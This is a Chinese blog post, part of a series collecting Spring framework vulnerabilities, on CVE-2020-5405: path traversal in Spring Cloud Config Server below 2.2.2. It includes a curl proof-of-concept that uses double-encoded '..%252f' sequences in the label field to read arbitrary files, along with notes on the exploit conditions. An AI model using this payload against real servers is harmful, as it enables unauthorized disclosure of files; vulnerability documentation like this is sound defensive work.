spring框架漏洞整理(Spring Cloud Config路径穿越导致的信息泄露)

àì夳堔傛蜴生んèń 2023-09-23 13:14 56阅读 0赞

CVE-2020-5405 Spring Cloud Config路径穿越导致的信息泄露。

此spring框架漏洞影响版本：spring-cloud-config-server < 2.2.2

https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/65bbd0ec4f2fd012318f7d91548ba1f338d5e064/Spring%20Cloud/CVE-2020-5405%20Spring%20Cloud%20Config%20%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/README.md

poc：

Spring Cloud Config路径穿越导致的信息泄露利用点1：

curl http://127.0.0.1:9988/foo/profiles/%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp/aaa.xxx

#

读取 /User/xuanyonghao/tmp/aaa.xxx 文件

foo 对应 {application}
profiles 对应 {profiles}
%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp 对应 {label}

#

todo 条件限制：

todo 1. 文件必须有后缀，也就是类似 .txt 等等。

todo 2. cloud: config: server: native: search-locations: file:///tmp/{label}，此处的目录需要有{application}或{profiles}或{label}&#x

发表评论取消回复

表情：

评论列表（有 0 条评论，56人围观）

还没有评论，来说两句吧...

相关阅读

相关 spring cloud config+ spring cloud bus

基于server和client端实现全局刷新将热刷新逻辑和具体的服务应用解耦 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpd

水深无声/ 2023年10月03日 11:52/ 0 赞/ 93 阅读

相关 spring框架漏洞整理(Spring Cloud Config路径穿越导致的信息泄露)

CVE-2020-5405 Spring Cloud Config路径穿越导致的信息泄露。此spring框架漏洞影响版本：spring-cloud-config-se

àì夳堔傛蜴生んèń/ 2023年09月23日 13:14/ 0 赞/ 57 阅读

相关 spring框架漏洞整理(Spring Boot Actuator命令执行漏洞)

spring框架漏洞整理之CNVD-2019-11630 Spring Boot Actuator命令执行漏洞 https://www.veracode.com/blo

比眉伴天荒/ 2023年09月23日 13:14/ 0 赞/ 209 阅读

相关 spring框架漏洞整理(Spring Framework漏洞)

spring框架漏洞整理之Spring Framework漏洞(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiatio

港控/mmm°/ 2023年09月23日 13:14/ 0 赞/ 210 阅读

相关 spring框架漏洞整理(Spring Data漏洞)

Spring Data漏洞，Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons 是 Spring Data 下所有子

Myth丶恋晨/ 2023年09月23日 13:14/ 0 赞/ 113 阅读

相关 spring框架漏洞整理(Springboot漏洞)

本文搜集了所有 spring 相关漏洞，对它们的利用条件和检测方式进行梳理和总结，希望在面对 spring 的时候能够有一个更完整的思路。本文重点讲解Springboot相关漏

深藏阁楼爱情的钟/ 2023年09月23日 13:13/ 0 赞/ 116 阅读

相关 spring框架漏洞整理(Spring Boot Actuator相关漏洞)

本文搜集了所有 spring 相关漏洞，对它们的利用条件和检测方式进行梳理和总结，希望在面对 spring 的时候能够有一个更完整的思路。这里更多是的是的利用条件和检测方式的总

女爷i/ 2023年09月23日 13:13/ 0 赞/ 212 阅读

相关 spring框架漏洞整理

近日， Spring官方发布多个安全公告其中包括3个严重，2个高危漏洞，漏洞涉及Spring Messaging组件， Spring Security框架，Spring Dat

Bertha 。/ 2023年09月23日 13:13/ 0 赞/ 218 阅读

相关 Spring cloud config综合整理

Spring Cloud Config为分布式系统中的外部化配置提供服务器和客户端支持。使用Config Server，您可以在所有环境中管理应用程序的外部属性。客户端和服务器

野性酷女/ 2022年05月19日 11:19/ 0 赞/ 264 阅读

相关 Spring Cloud Config获取配置信息

Spring Cloud Config配置信息是从git上面获取的，本文提供四个配置文件 [https://gitee.com/sgqing/SpringCloudConfi

ゝ一纸荒年。/ 2022年05月17日 11:22/ 0 赞/ 315 阅读